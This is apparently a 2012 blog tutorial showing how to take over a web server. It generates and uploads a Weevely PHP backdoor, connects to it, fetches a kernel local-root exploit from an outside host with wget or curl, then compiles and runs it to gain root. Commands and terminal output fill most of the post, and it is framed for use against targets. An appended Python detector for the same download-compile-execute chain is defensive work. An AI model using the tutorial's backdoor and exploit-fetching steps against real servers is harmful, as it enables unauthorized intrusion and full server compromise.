30 Apr 2012

SERVER ROOTING WITH WEEVELY BACKDOOR IN BACKTRACK 5

R00ting a server with Weevely (backdoor in BackTrack)

Hello again guyz, this is me, Aitezaz Mohsin.

Today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all, open Weevely:
Menu > BackTrack > Maintaining Access > Web Backdoors > Weevely
Or open a terminal and type:
root@root: cd /pentest/backdoors/web/weevely

############################################################

Now let's make our backdoor by typing:
root@root: ./main.py -g -o /root/Desktop/backdoor.php -p password
This command creates a backdoor called 'backdoor.php' protected by the password 'password'.

++++++++++++++++++++++ Options We Need ++++++++++++++++++++++++
-g  = generate a backdoor
-o  = output file for the generated backdoor
-p  = password for the backdoor
-u  = URL of the uploaded backdoor
-t  = start a terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Steps:

  1. Upload our backdoor and connect to it.
  2. Check the kernel version and find a LocalR00t exploit for it.
  3. Compile the LocalR00t.
  4. Execute it.
###########################################################################
Let's start:


  • Open your shell and upload the backdoor:

The link to the backdoor will be in the same directory as the shell. For example:
www.target.com/uploads/shell.php           <== shell
www.target.com/uploads/backdoor.php   <== backdoor

  • Connect to the backdoor by typing:
 ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password

    root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password
      Weevely 0.3 - Generate and manage stealth PHP backdoors.
      Copyright (c) 2011-2012 Weevely Developers
      Website: http://code.google.com/p/weevely/

    + Using method 'system()'.
    + Retrieving terminal basic environment variables.

    [hacker@target.com/]

    • Now, to find the kernel version, type:
    uname -a
    [hacker@target.com/] uname -a
    2.6.18 (example)


    • Now we have to find the localroot exploit for that kernel on:
    1. www.1337day.com
    2. www.exploit-db.com
    3. www.google.com
    and some others.

    Now we go to the directory /tmp/, because it is always writable.
    Let's say the kernel was 2.6.18.
    There are a few ways to get the localroot onto the server:
    1. uploading through the shell
    2. the wget method
    3. curl
    Let me explain how each method works:

    Of course you already know how to upload through the shell :P

    • wget
    wget www.exploit.com/2.6.18.c
    • curl
    curl www.exploit.com/2.6.18.c -o new_name

    For this TUT we will use WGET.




    ############################################




    [hacker@target.com/tmp/]ls
    file
    file1
    anything
    [hacker@target.com/tmp/]wget www.exploit.com/2.6.18.c
    --2012-01-29 05:43:37--  http://1337day.com/exploits/17158
    Resolving exploitcom... 127.1.1
    Connecting to exploit.com|127.1.1|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: unspecified [text/html]
    Saving to: `2.6.18.c'


         0K .........                                               208M=0s


    2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
     [hacker@target.com/tmp/]ls
     2.6.18.c
     file
     file1
     anything
    #############################################
    OK, now the exploit is on the server; we have to compile it with this command:
    gcc 2.6.18.c -o zombie
    [hacker@target.com/tmp/]gcc 2.6.18.c -o zombie




    [hacker@target.com/tmp/]ls
     2.6.18.c
     file
     file1
     anything
     zombie


    ++++++++++++++++
    chmod 777 zombie
    ++++++++++++++++
    [hacker@target.com/tmp/]chmod 777 zombie


    ++++++++++++++++
    executing..
    ++++++++++++++++


    [hacker@target.com/tmp/]./zombie
    .
    .
    .
    .
    .
    done!
    [hacker@target.com/tmp/]id
    uid=(root) gid=(root)


    R00ted!
    cheers
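As an added defensive example (not part of the original post), here is a Python detector for the chain walked through above: the web server account fetching a file into /tmp, compiling it, chmod-ing it, and then running a binary from /tmp. The one-line-per-exec log format, the field names and the set of web server accounts are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample execve log in a hypothetical one-line-per-exec format (not real auditd output).
SAMPLE_LOG = """\
2012-01-29T05:43:37 user=www-data cwd=/tmp exe=/usr/bin/wget args=wget www.exploit.com/2.6.18.c
2012-01-29T05:44:02 user=www-data cwd=/tmp exe=/usr/bin/gcc args=gcc 2.6.18.c -o zombie
2012-01-29T05:44:10 user=www-data cwd=/tmp exe=/bin/chmod args=chmod 777 zombie
2012-01-29T05:44:15 user=www-data cwd=/tmp exe=/tmp/zombie args=./zombie
2012-01-29T06:10:00 user=alice cwd=/home/alice exe=/usr/bin/gcc args=gcc hello.c -o hello
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) cwd=(?P<cwd>\S+) exe=(?P<exe>\S+) args=(?P<args>.*)$")
WEB_USERS = {"www-data", "apache", "httpd", "nobody"}  # assumed accounts a PHP backdoor's system() runs as
STAGES = {"download": ("wget", "curl"), "compile": ("gcc", "cc"), "chmod": ("chmod",)}
WINDOW = timedelta(minutes=10)  # the whole chain in the post takes well under this

def stage_of(ev):
    """Map one execve event to a stage of the /tmp download-compile-chmod-run chain, or None."""
    name, in_tmp = ev["exe"].rsplit("/", 1)[-1], ev["cwd"].startswith("/tmp")
    if ev["exe"].startswith("/tmp/"):
        return "execute"  # running a binary that lives in /tmp
    for stage, tools in STAGES.items():
        if name in tools and in_tmp:
            return stage
    return None

def parse(log_text):
    """Parse the hypothetical log format; returns one dict per recognised line."""
    return [m.groupdict() for m in map(LINE_RE.match, log_text.splitlines()) if m]

def detect(log_text, window=WINDOW):
    """One alert per web-server account whose download, compile and execute stages all fall within `window`."""
    per_user = defaultdict(list)
    for ev in parse(log_text):
        stage = stage_of(ev)
        if stage and ev["user"] in WEB_USERS:
            per_user[ev["user"]].append((datetime.fromisoformat(ev["ts"]), stage, ev["args"]))
    alerts = []
    for user, hits in sorted(per_user.items()):
        hits.sort()  # real logs are not guaranteed to arrive in time order
        for i, (t0, s0, _) in enumerate(hits):
            chain = [h for h in hits[i:] if h[0] - t0 <= window]
            stages = [h[1] for h in chain]
            if s0 == "download" and "compile" in stages and "execute" in stages:
                alerts.append({"user": user, "stages": stages, "commands": [h[2] for h in chain]})
                break  # one alert per account is enough; later hits belong to the same chain
    return alerts
```

A /tmp mounted noexec, or a PHP configuration that disables system() for the web server, would break the same chain before it reaches the execute stage.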
